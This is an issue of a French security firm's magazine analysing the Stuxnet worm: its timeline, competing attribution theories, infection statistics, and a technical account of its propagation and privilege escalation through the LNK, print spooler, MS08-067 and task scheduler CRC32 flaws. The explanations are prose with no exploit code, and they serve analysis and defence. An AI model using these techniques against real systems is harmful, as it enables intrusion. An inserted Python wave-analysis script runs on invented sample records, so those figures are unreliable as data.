ACTUSECU 27

XMCO

STUXNET: ANALYSIS, MYTHS AND REALITIES

CONTENTS
Stuxnet: complete two-part article on THE virus of 2010
Keyboard Layout: analysis of the MS10-073 vulnerability used by Stuxnet
Current news: Top 10 hacking techniques, zero-day IE, GS Days 2010, ProFTPD...
Blogs, software and our favorite Tweets...

This document is the property of XMCO Partners. Any reproduction is strictly prohibited.

Are you concerned by IT security in your company?

XMCO Partners is a consultancy whose business is IT security audits.

Services:

Intrusion tests
Our experts in intrusion can test your networks, systems and web applications.
Use of OWASP, OSSTMM and CCWAPSS methodologies.

Security audit
Technical and organizational audit of the security of your Information System.
Best Practices ISO 27001, PCI DSS, Sarbanes-Oxley.

PCI DSS support
Consulting and auditing for environments requiring PCI DSS Level 1 and 2 certification.

CERT-XMCO: Vulnerability monitoring
Personalized monitoring of vulnerabilities and the fixes affecting your Information System.

CERT-XMCO: Response to intrusion
Detection and diagnosis of intrusion, collection of evidence, log examination, malware autopsy.

About XMCO Partners: Founded in 2002 by experts in security and managed by its founders, we work in the form of fixed-fee projects with a commitment to achieve results. Intrusion tests, security audits and vulnerability monitoring are the major areas in which our firm is developing. At the same time, we work with senior management on assignments providing support to heads of information systems security, in drawing up master plans and in working on awareness-raising seminars with several large French accounts.

To contact XMCO Partners and discover our services: http://www.xmco.fr

WWW.XMCO.FR

FEB. 2011

EDITORIAL

We wish you a happy 2011

This is the first issue of ActuSecu in 2011. As usual, a very busy year end made us a little late in writing this issue. The XMCO team is strengthened by the arrival of Florent Hochwelker, a security consultant coming from SkyRecon. The security of the Windows kernel, DEP bypass and other tricks for happily causing memory overflows no longer hold any secrets for him. Florent has also written his first article in this issue.

What will 2011 bring us in terms of attacks and security? Without wishing to gaze into a crystal ball, it is clear, for me, that 2011 will be the year of m-payment: contactless mobile payments (by NFC or GSM). Although these technologies are, a priori, new, they are based on existing and proven frameworks. There will certainly be implementation errors that may be exploited by pirates, especially as these are particularly ingenious concerning hacking means of payment. We hope that you find this issue interesting and we look forward to seeing you at Black Hat Barcelona, for which XMCO is a partner.

Frédéric Charpentier, Chief Technology Officer

ACTUSECU
Editor in chief: Adrien GUINAULT
Contributors: Charles DAGOUAT, Florent HOCHWELKER, Stéphane JIN, François LEGUE, Frédéric CHARPENTIER, Yannick HAMON

CONTACT XMCO
actu_secu@xmco.fr
info@xmco.fr

THE XMCO AGENDA
PCI DSS QSA TRAINING: 7 and 8 March in London
BLACK HAT EUROPE: 16 and 17 March in Barcelona

CONTENTS

Stuxnet Part I: analysis, myths and realities ........ 5
An examination of THE virus of 2010

Stuxnet Part II: technical analysis ........ 13
Propagation, infection and attacks on industrial systems.

Keyboard Layout vulnerability ........ 29
Analysis of the "elevation of privileges" vulnerability used by Stuxnet (MS10-073).

Current news ........ 38
Top Ten hacking techniques, zero-day IE, GS Days, ProFTPD...

Blogs, software and extensions ........ 52
IMA, VMware compliance checker, Twitter and the rn_101 blog.

XMCO 2011

STUXNET PART I: HISTORY, MYTHS AND REALITIES

Stuxnet, elected malware of the year

It would have been inconceivable not to devote an article to THE malware of the year 2010. Although nearly everything has already been said on this subject, we could not resist writing an article on Stuxnet several months after the media buzz subsided. Much is still obscure concerning this malware, its origins and its developers. However, we will try to give a summary, taking an objective view in relation to the various papers covering the subject.

If there is one thing to remember about 2010, it is surely the case of Stuxnet. This malware, specifically produced to carry out the second highly-publicized targeted attack of 2010 (after Aurora), caused comment for more than six months! This article is intended as a summary of this long period, which was punctuated by many new developments. It covers the development of the discoveries and announcements that took place during this period and tries to analyze all the facts in order to draw conclusions. Between reminders on technical matters, genuine rumors and false realities, this article will appraise the situation as completely as possible.

Preliminary reminders

Stuxnet is a complex piece of malware constructed from many items, intended to sabotage the normal functioning of certain critical systems. In contrast to the somewhat indiscreet approach used to access these sensitive systems, the sabotage itself is intended to be very discreet. To approach its target, Stuxnet exploits at least four zero-day vulnerabilities (all now corrected by Microsoft) targeting different versions of Windows, as well as the famous MS08-067 vulnerability that was corrected several years ago.

To quickly reach its target, the malware also uses a password defined by default within certain SCADA (Supervisory Control And Data Acquisition) systems based on the Siemens SIMATIC WinCC software.

Thanks to all the work performed by various researchers with an interest in malware, the role of Stuxnet has been clarified. The malicious code acts in several stages. Firstly, a removable item of storage media is used to compromise a system on a local network. Once present on a network, the malware replicates, moving towards the discovery of a point of access to its target: a system on which WinCC is installed. Secondly, when such a target is discovered, the behavior of the various items controlling the target architecture is modified in order to physically impair the integrity of the industrial production system. In the case of Stuxnet, this means altering the normal function of certain critical systems by manipulating their controllers.

History

It is difficult to create a comprehensive history of the events relating to Stuxnet because of the numerous new developments and announcements during this long period. Limiting ourselves to the dates of the discoveries made and publicized by the researchers would not really make sense. Because this attack is so complex, it is necessary to consider the period before the media took an interest in the subject. We are therefore going to try, with hindsight, to trace a history that takes into account the dates before the beginning of the media interest in this sabotage campaign, as well as the discoveries made after this attack attracted media interest.

From Stuxnet

Everything officially began on 17 June 2010, when the Belarusian company VirusBlokAda published a report on the virus RootkitTmphider, mentioning the LNK security vulnerability. This vulnerability, which was zero-day in June 2010, allows a pirate to execute code when a directory is opened, whether it is shared (SMB, WebDAV), local or on a mass-storage peripheral (external hard disk, USB drive, portable telephone, MP3 player, etc.). The vulnerability gradually began to arouse comment. MITRE dedicated reference CVE-2010-2568 to it on the following 30 June, and on 13 July, Symantec added detection of this virus under the name W32.Temphid. The next day, on 14 July, MITRE assigned references CVE-2010-2729 and CVE-2010-2743 to security vulnerabilities present in the print spooler and in keyboard management. Two days afterwards, on 16 July, Microsoft published a security alert referenced KB2286198, concerning the security vulnerability exploited by the malware: the handling of LNK files was then clearly identified as problematic by the software publisher. At the same time, VeriSign revoked the certificate belonging to Realtek Semiconductor Corp., because it had been used by pirates to sign certain drivers used by their malware.

Symantec subsequently revealed that the first malware with a driver signed by this certificate, and identified as coming from the Stuxnet family, went back to January 2010. On 17 July, the antivirus publisher ESET detected new malware from the Stuxnet family. This used a certificate belonging to JMicron Technology Corp. to sign one of its components. On 19 July, a year after ivanlefOu had published a proof of concept, the researcher HD Moore published exploitation code within the Metasploit framework. This allowed control of a system to be taken over remotely by exploiting the security vulnerability through WebDAV sharing: a pirate simply had to encourage an Internet user to visit a web page with Internet Explorer to take control of the underlying system. The same day, Symantec renamed W32.Temphid to W32.Stuxnet, and Siemens reported that the company was studying reports referring to the compromise of several SCADA systems linked to WinCC. On 20 July, Symantec announced that it had discovered how the malware communicated with its command and control (C&C) servers, and the meaning of the exchanged messages. On 21 July, MITRE assigned reference CVE-2010-2772 to the security vulnerability present within the Simatic WinCC and PCS 7 software from Siemens: a password had been hard-coded and could be used to access certain components of Siemens applications with elevated privileges. Two days afterwards, on 23 July, VeriSign revoked the certificate belonging to JMicron Technology Corp.

Then several days passed, during which the researchers and specialists involved in this study certainly did not stop working. On 2 August, outside its "Patch Tuesday" cycle, Microsoft published security bulletin MS10-046, proposing several patches for the LNK vulnerability. On 6 August, Symantec presented the method used by Stuxnet to inject and hide code on a PLC (Programmable Logic Controller). On 14 September, Microsoft published a new security bulletin (MS10-061) offering a patch for the security vulnerability present within the print spooler, which had been discovered by Symantec in August. The same day, MITRE assigned reference CVE-2010-3338 to the "elevation of privileges" vulnerability identified within the task scheduler. Just several days afterwards, on 17 September, Joshua J. Drake (jduck1337) published exploitation code within the Metasploit framework. This allowed control to be taken of a system via the security

vulnerability present within the Windows print spooler. Lastly, to end the month of September, the publishers of the antivirus solutions ESET and Symantec published a first version of their reports on 30 September, presenting their almost-complete analyses of the malware; both publishers did not wish to disclose information on vulnerabilities that had not yet been corrected by Microsoft. To prevent the exploitation of the last security vulnerability exploited by Stuxnet, Microsoft, on its "Patch Tuesday" of 12 October, published security bulletin MS10-073, giving a patch for the vulnerability related to keyboard management. The following month, on 20 November, Joshua J. Drake published new exploitation code within the Metasploit framework to exploit the vulnerability present within the Windows task scheduler. Then, after two months of waiting, in its "Patch Tuesday" of 14 December, Microsoft published security bulletin MS10-092, offering a patch to correct the security vulnerability related to the task scheduler.

The progress made by Ralph Langner

Thanks to the work done by the German researcher Ralph Langner, which began as soon as the media began to take an interest in the malware, it has been possible to identify numerous leads relating to the origin of Stuxnet, to its potential targets and to the people hiding behind this attack. Of course, all information published by this former psychologist should be treated with caution. Even so, it appears with hindsight that many of the opinions he gave have subsequently been validated by other researchers (such as Symantec) or by documents from third-party sources. On 16 September, Langner announced that Iran, and particularly the nuclear power station at Bushehr, built in cooperation with Russia, was the main target. The researcher was also the first to speak of cyber war. On each following day, he published new hypotheses and new discoveries.

The researcher approached numerous entities, such as Congress, the DHS and the INL in the United States, and also appeared on television. On 13 November, Langner announced, just after Symantec, that he had come to the same conclusions concerning the malicious code 315 and the PLCs targeted. He took advantage of this to present the K-1000-60/3000-3 steam turbines manufactured by the Russian manufacturer "Power Machines" which, according to him, equipped the Bushehr nuclear plant. The following day, he presented his analysis concerning the entity that probably ordered this attack: for him, only a government could have been involved in such a scenario. The complexity of the knowledge that was necessary, the human and material resources required and, lastly, the cost of such an organization make certain countries ideal suspects. Among the list chosen by the researcher were Israel, the United States, Germany and Russia.

On 15 November, Langner presented a technical explanation of how the malicious code 315 could destroy gas centrifuges. He was then supported by the nuclear specialist from ISIS (Institute for Science and International Security), David Albright. On the same day, a second announcement gave the details of the attack performed by code 417. In the days that followed, numerous details of this second attack were presented and a hypothesis concerning the targets was given: according to the researcher, code 315 targeted the IR-1 centrifuges present in the Natanz enrichment centre, while module 417 targeted the steam turbines in the electrical power station at Bushehr. A single weapon, malware, which contained two payloads: the code modules 315 and 417, targeting different PLCs.

At the end of November, the former psychologist announced that Iran and Venezuela had concluded an agreement in 2008. This alliance allowed Iran to install ballistic missiles on Venezuelan territory in exchange for the help provided by Iran in setting up a nuclear program in the host country: a situation in which the United States would surely not be delighted to find itself, and therefore, in his opinion, a justification for the establishment of this secret program. At the end of December, helped by the publication of the report from ISIS, which analyzed the nuclear infrastructure situation reported by the inspectors from the International Atomic Energy Agency (IAEA), Langner announced that he had discovered the precise target of the malware, and more precisely of block 417: the safety system associated with the cascades of centrifuges used to enrich uranium. In his opinion, the PLCs targeted were used every two years in the functioning of an enrichment centre such as Natanz.

At the beginning of January, the researcher presented a new hypothesis on the role of blocks 315 and 417. According to him, their main objective was not the destruction of the centrifuges, but rather to make these production systems massively inefficient. By analyzing the data embedded in the code, together with theoretical calculations on the yield of uranium production, the researcher concluded that the operations performed by the two blocks of code would drastically reduce the yield of the centrifuges. To summarize, over the course of these few months, Langner was probably the researcher who communicated most concerning Stuxnet.

The "New York Times" theory

For the first time since the beginning of this scenario, an article published by the New York Times on 16 January described a plausible scenario. Even though this scenario is based more on a correlation between events and facts than on tangible proof, its authors have the distinction of being among the first to officially name the various protagonists. It should therefore be taken with caution and is the responsibility only of the journalists who wrote the New York Times article. In this scenario, the United States set up a plan to hinder Iran in its quest to produce nuclear weapons. According to the journalists, President Bush gave his agreement, one month before the end of his term of office in January 2009, to the establishment of a secret program aiming to sabotage the electrical and computer systems at the main uranium enrichment centre at Natanz. From the beginning of his term of office, Barack Obama, who had been informed of this before taking office, accelerated this program on the advice of those knowledgeable concerning the case of Iran.

Still according to the New York Times journalists, this program was based on work performed at the Idaho National Laboratory (INL) in partnership with the Department of Homeland Security (DHS) and Siemens. During 2008, they claim, Siemens requested the INL to test the security of its Step7 software used to control a set of industrial systems (tools, probes, etc.), using controllers such as PCS7 (Process Control System 7). The results obtained, including numerous security vulnerabilities, were presented in July at a conference held in Chicago. Several months later, American diplomacy succeeded in establishing an embargo on certain components necessary to the correct functioning of a uranium enrichment centre. According to a diplomatic cable

revealed by Wikileaks, in April 2009, 111 Siemens controllers necessary for controlling a uranium enrichment cascade were therefore blocked at the port of Dubai in the United Arab Emirates. At the end of 2010, the Institute for Science and International Security (ISIS) reported that, according to a report by inspectors from the IAEA, 984 defective controllers had been replaced at the end of 2009. Strangely, this figure exactly corresponds to the number of Siemens controllers contained within an enrichment cascade. Nevertheless, what is the relationship between these 984 defective controllers and Stuxnet? These controllers were replaced between the end of 2009 and the beginning of 2010, while Stuxnet made its first public appearance at the beginning of 2010, although it was not yet identified. The article presents Israel as the principal ally of the United States in manufacturing and testing this malware. This "small" country, which is highly advanced technologically, particularly in cyber-warfare, is alleged to have built a replica of the Natanz enrichment centre in its own nuclear research centre, Dimona. The journalists gave two reasons for this alliance. Among the Americans' other allies, none would be able to make the IR-1 centrifuges work properly. These were derived from the Pakistani P-1, themselves copied from plans of the German G-1 stolen by the doctor of physics Abdul Qadeer Khan (father of the Pakistani nuclear bomb and in charge of a network specialized in the sale of nuclear material that helped to spread sensitive technology to Iran, North Korea and Libya). The second reason was that Israel had long been openly seeking to prevent Iran from obtaining nuclear weapons.

According to the authors of this article, other information reveals the magnitude of this American program. Massoud Ali Mohammadi, an Iranian nuclear specialist, was killed in January 2010 by an explosion caused by a remotely-triggered bomb fixed to a motorbike. On 29 November 2010, when Iran recognized for the first time that Natanz had suffered damage related to Stuxnet, a second physicist, Majid Shahriari, was the victim of a second fatal "accident". On both of these occasions, president Mahmoud Ahmadinejad directly accused the United States and Israel of having ordered these assassinations. After this second suspect event, the Iranians took the decision to "hide" Mohsen Fakrizadeh, the third (and last?) nuclear specialist.

Forbes's counter theory

Another article, published by journalists at Forbes the following day, strongly criticized this analysis. According to them, it was based on no tangible proof: only gestures made by certain diplomats at press conferences and the content of several diplomatic cables revealed by Wikileaks gave any support to the journalists' article. The Forbes journalists took advantage of trashing this theory to push their own analysis, which had been published in December. According to them, the "real" powers behind Stuxnet were Finland and China. The reasoning behind this was that Vacon, the Finnish manufacturer of frequency converters (variable frequency drives), had a manufacturing plant in China. This would mean that China would know precisely which PLCs to target. Furthermore, China is suspected of having access to part of the source code of Windows, which could explain the discovery and use of four zero-day vulnerabilities.

Numerous other details relating to China and Finland were also revealed by the journalists to support their theory. For example, RealTek Semiconductor, the Taiwanese company whose certificate was stolen to sign the drivers, has an establishment in the industrial zone of Suzhou, in China, not far from Vacon. Finally, China was relatively untouched by the worm.

The other factors to be remembered

On 9 July, the Indian satellite INSAT-4B was declared inoperable. This satellite, which was used for transmitting telecommunications, television broadcasting, meteorology and for individual search and rescue, was controlled by a SCADA system based on Siemens S7-400 and SIMATIC WinCC PLCs. This announcement occurred during a complex period in Indo-Chinese relations, because both countries are fiercely competing with each other in the aerospace sector to be the first Asian country to put a man on the moon.

Although Symantec and other publishers of anti-virus software named Iran as the main victim of Stuxnet, it was not before mid-October that the subject of Stuxnet was publicly mentioned by Iran. During this first speech, the Iranian president simply denied the damage that the worm was supposed to have caused to national infrastructure. A month later, in November, the country recognized for the first time that it had suffered "slight" problems leading to the postponement of the launch of the Bushehr plant. In reaction to this attack, the government arrested some Russian service contractors suspected of being spies. These were subsequently released.

Lastly, very many international experts criticized the quality of the code in the malware. Several commentators criticized the amateurism of certain functionalities of Stuxnet: the very basic component that communicates with the C&C servers (for example, no encryption of communications, the lack of robustness of the control servers, etc.), the absence of additional protection (polymorphism, anti-debug and robust encryption), and finally an indiscreet means of proliferation that is unworthy of an attack carried out discreetly by the military. According to these commentators, these observations alone are evidence that no government is hiding behind Stuxnet.

Since the beginning of 2011, numerous other events have been added to this story. Symantec, by recovering samples obtained from various publishers of antivirus software in the market, was able to make a statistical study of the attacks. From these samples Symantec was able to produce graphs representing the proliferation of the malware. For this, the researchers used the information recorded (date and time, for example) by the malware when it infects a new system. These graphs clearly highlight the five dates corresponding to the attacks and the number of targets initially contaminated during each of these events.

So, thanks to the 3,280 samples recovered from ESET, F-Secure, Kaspersky, Microsoft, McAfee and Trend Micro, Symantec was able to draw the following conclusions:
- exactly five organizations were targeted; these five organizations are all present in Iran;
- most of the 12,000 infections corresponding to the 3,280 samples can be traced to these various organizations;
- among the victims used as vectors for propagation, three were attacked once, one was targeted twice and another was attacked three times;
- these attacks took place at very precise dates: in June 2009, one month later in July 2009, then at three further stages in March, April and May 2010;
- lastly, three variants of the malware, corresponding to the attacks that took place in June 2009, April 2010 and May 2010, were observed. The existence of a fourth variant is assumed but has not been observed among the samples obtained.
According to Symantec, these five companies are suppliers with links to the Natanz enrichment centre.
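The wave analysis attributed to Symantec above (grouping infection timestamps into attack dates, then counting the organizations initially hit in each wave and how often each was reused as an entry point) can be reproduced over a list of infection records. The Python below is an added example written for this article; it is neither XMCO's nor Symantec's code. It assumes records of the shape the article describes (infection time, organization, host) plus a label for the malware build that wrote them, and it runs on constructed data, invented here and shaped to reproduce the pattern the article reports: five waves, five organizations, one organization hit three times and another twice. The time-gap clustering, the seven-day gap threshold and the 24-hour "initial entry" window are design choices of this example, not of the original study.

```python
"""Infection-wave analysis over constructed Stuxnet-style host records (added example)."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class InfectionRecord:
    """One entry of the kind the article says the malware records on each new
    victim: infection time, the host and its organization (here taken from the
    host's domain name), plus a label for the malware build that wrote it."""
    seen: datetime
    org: str
    host: str
    variant: str


def rec(ts: str, org: str, host: str, variant: str) -> InfectionRecord:
    return InfectionRecord(datetime.strptime(ts, "%Y-%m-%d %H:%M"), org, host, variant)


# Constructed sample data (not real telemetry): domain names, host names,
# build labels and dates are invented; only the overall shape follows the
# article's summary of Symantec's findings.
SAMPLE_RECORDS = [
    rec("2009-06-22 09:12", "org-a.example", "A-WS01", "v1"),
    rec("2009-06-23 14:40", "org-a.example", "A-WS07", "v1"),
    rec("2009-06-25 08:03", "org-a.example", "A-ENG02", "v1"),
    rec("2009-07-07 10:30", "org-b.example", "B-WS03", "v1"),
    rec("2009-07-08 16:05", "org-b.example", "B-LAB01", "v1"),
    rec("2010-03-01 08:00", "org-c.example", "C-WS02", "v1"),
    rec("2010-03-01 15:22", "org-a.example", "A-WS11", "v1"),
    rec("2010-03-03 09:48", "org-c.example", "C-ENG05", "v1"),
    rec("2010-03-04 11:15", "org-a.example", "A-WS12", "v1"),
    rec("2010-04-14 10:00", "org-d.example", "D-WS01", "v2"),
    rec("2010-04-15 09:30", "org-a.example", "A-WS03", "v2"),
    rec("2010-04-16 13:10", "org-d.example", "D-WS04", "v2"),
    rec("2010-05-11 07:45", "org-e.example", "E-WS06", "v3"),
    rec("2010-05-11 11:20", "org-b.example", "B-WS09", "v3"),
    rec("2010-05-13 15:00", "org-e.example", "E-ENG01", "v3"),
    rec("2010-05-14 08:25", "org-e.example", "E-WS02", "v3"),
]


def cluster_waves(records, gap_days=7):
    """Sort records by time and split them into attack waves: a new wave starts
    whenever the silence between two consecutive infections exceeds gap_days.
    Propagation inside one organization spans days, while the article's waves
    are weeks or months apart, so a one-week gap separates them cleanly."""
    gap = timedelta(days=gap_days)
    waves = []
    for r in sorted(records, key=lambda x: x.seen):
        if waves and r.seen - waves[-1][-1].seen <= gap:
            waves[-1].append(r)
        else:
            waves.append([r])
    return waves


def summarize_wave(wave, entry_window_hours=24):
    """Describe one wave: its start date, how many hosts it reached, which
    organizations were infected within the first entry_window_hours (the
    targets initially contaminated) and which malware builds were seen."""
    start = wave[0].seen
    window = timedelta(hours=entry_window_hours)
    return {
        "start": start.date().isoformat(),
        "infections": len(wave),
        "initial_orgs": sorted({r.org for r in wave if r.seen - start <= window}),
        "variants": sorted({r.variant for r in wave}),
    }


def times_targeted(waves):
    """Per organization, the number of waves in which it was an initial target."""
    counts = defaultdict(int)
    for wave in waves:
        for org in summarize_wave(wave)["initial_orgs"]:
            counts[org] += 1
    return dict(counts)


def report(records=SAMPLE_RECORDS, gap_days=7):
    """Full summary: one entry per wave, the victim organizations, and how
    often each one served as an entry point."""
    waves = cluster_waves(records, gap_days)
    return {
        "waves": [summarize_wave(w) for w in waves],
        "organisations": sorted({r.org for r in records}),
        "times_targeted": times_targeted(waves),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(report(), indent=2))
```

Run as a script, it prints the five waves with their start dates, sizes, entry organizations and builds, then the per-organization count that mirrors the "once / twice / three times" breakdown in the article. The gap threshold is the sensitive parameter: raising it to 30 days merges the June and July 2009 waves and the April and May 2010 waves into single events, which is exactly the kind of ambiguity an analyst must resolve before stating how many distinct attacks took place.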

The day after this announcement, several media echoed another announcement that was particularly surprising. During a video shown at a party given in honor of the retirement of general Gabi Ashkenazi, and published by the conservative newspaper Haaretz, it was claimed that the newly-retired general had supervised the creation of Stuxnet. Nevertheless, as no official Israeli source has corroborated this announcement, it must be taken with caution.

The warning signs

The Stuxnet affair began well before 2010. Thus, Symantec was able to find traces of the malware going back to 2008. On 20 November 2008, Symantec observed the exploitation of the LNK vulnerability for the first time. This had not been analyzed at the time, and we had to wait until the appearance of Stuxnet to discover that pirates had known about this vulnerability for more than two years. The virus in question was then identified as "Trojan.Zlob" and does not appear to be related to Stuxnet. In April 2009, the researcher Carsten Kohler published an article in the magazine Hakin9 presenting a security vulnerability within the Windows print spooler. No one reacted, not even Microsoft, which was clearly concerned! Several months later, in June 2009, Symantec detected a new malware that is now identified as the first version of Stuxnet. This was very simple and did not carry all of the payloads that we know today. According to Symantec, it was in January 2010 that the first malware in the Stuxnet family appeared using the certificate from Realtek Semiconductor Corp. to sign one of its components. Lastly, it was in March 2010 that the first malware in the Stuxnet family appeared which exploited the LNK vulnerability.

Conclusion

Stuxnet has caused a lot of comment and been highly publicized. The various theories, analyses and hypotheses made until now do not allow any conclusions to be drawn with certainty, either concerning those ordering the attacks or the targets. However, according to the various discoveries made by several researchers and journalists (Symantec, Langner and the New York Times), Iran seems to have been targeted, especially the nuclear enrichment centre at Natanz. Concerning those ordering the attack, and bearing in mind its complexity, the resources used and the different information revealed by the journalists, Israel and the USA appear to have played a role in this affair. We must also bear in mind that all of the information revealed by the various observers is always subjective.

References

Resources on Stuxnet (ESET)
http://blog.eset.com/2011/01/03/stuxnet-informationand-resources

F-Secure (FAQ)
http://www.f-secure.com/weblog/archives/00002040.html
http://www.f-secure.com/weblog/archives/00002066.html

Timeline
http://www.infracritical.com/papers/stuxnet-timeline.txt

CERT-IST
http://www.cert-ist.com/fra/ressources/Publications_ArticlesBulletins/VersVirusetAntivirus/stuxnet/

New York Times
http://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html?pagewanted=all
http://www.nytimes.com/2010/11/30/world/middleeast/30tehran.html?pagewanted=print
http://www.nytimes.com/2010/01/13/world/middleeast/13iran.html?_r=1&pagewanted=print

Forbes
http://blogs.forbes.com/jeffreycarr/2011/01/17/the-newyork-times-fails-to-deliver-stuxnets-creators/?boxes=Homepagechannels
http://blogs.forbes.com/firewall/2010/12/14/stuxnetsfinnish-chinese-connection/

ACTU SCU 27

STUXNET PART II: TECHNICAL ANALYSIS

Stuxnet, elected malware of the year

After having looked at the history of Stuxnet and the theories and assumptions behind it, let us now look at its technical analysis. Some very good white papers (Symantec and ESET) have given a detailed presentation of the complexity of this malware. We will try to summarize everything to give an understanding of the propagation modes used, the relationships with industrial systems and the consequences that Stuxnet may cause.

Bjoern Schwarz

Charles Dagouat

General functioning
Stuxnet is a complex piece of malware. Its operation revolves around two main "functions": the propagation of the worm, which relies on vulnerabilities in the Windows platform, and the attack on SCADA systems, which targets WinCC and PCS 7. This second function corresponds to the payload carried by the malware, and it is built around the WinCC software component. WinCC is a very widespread supervisory control and data acquisition tool developed by Siemens. Installed on a Windows system, it is used to control automation equipment such as Programmable Logic Controllers (PLCs). This type of architecture is typical of the critical infrastructure found in industry.

To fulfil its task, Stuxnet follows a very specific scenario. The architecture of the malware is built around several main functionalities that correspond to the different stages of the attack. The first stage is not specific to Stuxnet but is common to the majority of worms: it is the propagation phase. During this phase, the malware seeks to spread within a given perimeter: the local network.

The second phase corresponds to the attack itself: this is the search for a target. In the case of Stuxnet, the target is a Siemens WinCC control and monitoring system linked to certain PLCs. If such a system is detected, its behaviour is discreetly altered. Lastly, the final phase corresponds to the physical consequence of this alteration: the undetectable effect acts discreetly on the system in order to destroy it slowly.



Phase I: malware propagation
Phase 1 of the attack carried out by Stuxnet therefore corresponds to the proliferation of the malware across an installed base of computers. For this, the authors of Stuxnet used no fewer than four zero-day vulnerabilities targeting various components of Windows. This propagation function may itself be subdivided into two parts: the first corresponds to compromising Windows systems and the second to the long-term installation of the worm on a compromised system.

The main points of entry chosen by the developers of Stuxnet to penetrate the target infrastructure are removable storage media such as USB drives and portable hard drives. Those behind the attack therefore rely mainly on human intervention to carry the worm from one system to another.

Main attack vector: removable storage media
The vulnerability in question relates to the way Windows handles shortcuts, i.e. files with the extensions ".LNK" and ".PIF". More precisely, the vulnerability lies in the way the icon of the shortcut is loaded. This icon is normally loaded from a CPL (Windows Control Panel) file through the system function "LoadLibraryW()". In reality, a CPL file is simply a DLL. By specifying the path to a malicious DLL in the "File Location Info" section of an LNK file, an attacker is therefore able to force any Windows system to execute arbitrary code simply by displaying the contents of a directory.


Exploitation of this vulnerability simply requires a user to open a directory containing the malicious shortcut. An exploit has already been published in the Metasploit framework. With it, an attacker only needs to get a user to visit a URL with Internet Explorer to take control of the remote system: in this proof of concept, the server forces the client to open a shared folder over the WebDAV protocol.

A user looking at the contents of a USB drive infected by Stuxnet can see the following six files:
- Copy of Shortcut to.lnk
- Copy of Copy of Shortcut to.lnk
- Copy of Copy of Copy of Shortcut to.lnk
- Copy of Copy of Copy of Copy of Shortcut to.lnk
- ~WTR4141.tmp
- ~WTR4132.tmp
The various shortcuts named "Copy of (...) Shortcut to.lnk" correspond to different versions of Windows. These links all load the library "~WTR4141.tmp" which, in turn, loads the file "~WTR4132.tmp".


After officially acknowledging the vulnerability by publishing security advisory KB2286198 on 16 July 2010, Microsoft reacted quickly by publishing bulletin MS10-046 and the associated patches on 2 August, outside its "Patch Tuesday", which was scheduled eight days later, on 10 August.



Additional attack vectors: local network
However, Stuxnet does not rely only on users to spread. It also uses two other vulnerabilities that can be exploited remotely within a local network. The first relates to the Microsoft print spooler, while the second targets the older vulnerability in the server service (MS08-067).

Print spooler
This vulnerability was first presented in the magazine Hakin9 in 2009. When a printer is shared on a system, a remote user is able to "print" (i.e. write) files into the "%System%" directory. Exploitation takes place in two phases. The first consists of dropping the files "winsta.exe" and "sysnullevnt.mof" into the directories "Windows\System32" and "Windows\System32\wbem\mof" respectively. The second phase consists of getting the script "sysnullevnt.mof" executed. This MOF ("Managed Object Format") file is used to force Windows to execute the code contained in the file "winsta.exe". Execution of this script is automatic, because MOF files placed in the directory "Windows\System32\wbem\mof" are automatically compiled by "mofcomp.exe", which registers the WMI event consumer that triggers the execution of "winsta.exe". This vulnerability was corrected by Microsoft in bulletin MS10-061, which added a series of checks before allowing a document to be printed.


Server service
Lastly, Stuxnet exploits the older MS08-067 vulnerability in the server service. This vulnerability, which at the time was massively exploited by Conficker/Downadup, is used here to drop a file in a C$ or Admin$ administrative share. Execution of this file is scheduled for the day after the compromise, using the task scheduler. The shellcode used by the malware to carry out these two actions appears to be relatively advanced, in contrast to the one used by Conficker. This vulnerability was corrected by Microsoft in bulletin MS08-067.

The exploitation of these various vulnerabilities allows the malware to spread both on a local network and, more widely, to all systems to which users connect removable storage media. Once installed on a Windows system, the malware has several functionalities that allow it to operate as part of a network. Among these, the malware installs an RPC server that allows it to exchange various items of information with other infected systems present on the LAN.

INFO
Free tools for removing malware, including Stuxnet
BitDefender and Microsoft have just released free tools for removing the malware currently in fashion. After publishing a tool last month for removing Zeus (see CXA-2010-1211), BitDefender has just published another tool for removing Stuxnet. As a reminder, the malware was first detected by a company based in Belarus (see CXA-2010-0893), following the discovery of the zero-day LNK vulnerability affecting all versions of Windows (see CXA-2010-0906). Microsoft has just updated its "Malicious Software Removal Tool", which can now deal with the most virulent botnet currently known: Zeus/ZBot. Zeus is malware under constant development, whose main aim is to steal banking information. The two tools can be downloaded from the following links:
Stuxnet: http://www.malwarecity.com/community/index.php?app=downloads&showfile=12
Zbot: http://blogs.technet.com/b/mmpc/archive/2010/10/12/msrt-on-zbot-the-botnet-in-a-box.aspx



Phase II: installation of the malware
The long-term installation of the malware requires certain actions that need elevated privileges. Exploiting the vulnerabilities presented above does not provide such privileges. In order to ensure maximum dissemination, Stuxnet therefore exploits two further vulnerabilities to elevate its privileges once the system has been compromised. Between them, these two vulnerabilities cover all existing versions of Windows: the first elevates privileges locally on older versions of the operating system (Windows 2000 and XP), while the second performs the same operation on more recent versions (Windows Vista, 7 and 2008).

The first vulnerability relates to the way keyboard layouts are handled by the driver "win32k.sys". An index read from a keyboard layout file (itself a DLL) is used without validation. This allows the malware to force the system kernel to execute code controlled from user mode. This vulnerability is described in detail in the article on page 29 and was corrected by Microsoft in bulletin MS10-073, which added a check preventing the use of an index that overflows the associated table.

The second vulnerability relates to the task scheduler. The definition of a task is stored as an ordinary XML file in the directory "%SystemRoot%\system32\Tasks". Access to this directory is restricted. Even so, the XML file corresponding to a task remains readable and writable by the user who created it. This XML file contains, among other things, information on how the task is executed, such as the user account and the required privilege level. A user who defined a task could therefore freely change the user identifier and the privilege level in order to elevate privileges.

To protect against this type of attack, Microsoft had introduced a "security feature" which calculates a hash of the task file when the task is defined and checks it before the task is executed. But the algorithm used for this hash, CRC32, is unfortunately not designed for security purposes: it is far too weak for that role, because collisions are easy to produce. The check is actually nothing more than a straightforward CRC of the XML file. By adding data in a comment field, it is therefore easy to produce a modified file with the same hash as the original.

Stuxnet therefore adds a task, computes the associated CRC32, "manually" edits the file to raise the privileges associated with it, adds a comment field and fills it with data chosen to produce a collision. The task is then executed with the highest privileges. This vulnerability was corrected by Microsoft in bulletin MS10-092, which changed the hash function used: CRC32 was replaced by SHA-256, an algorithm considered secure against collision attacks.

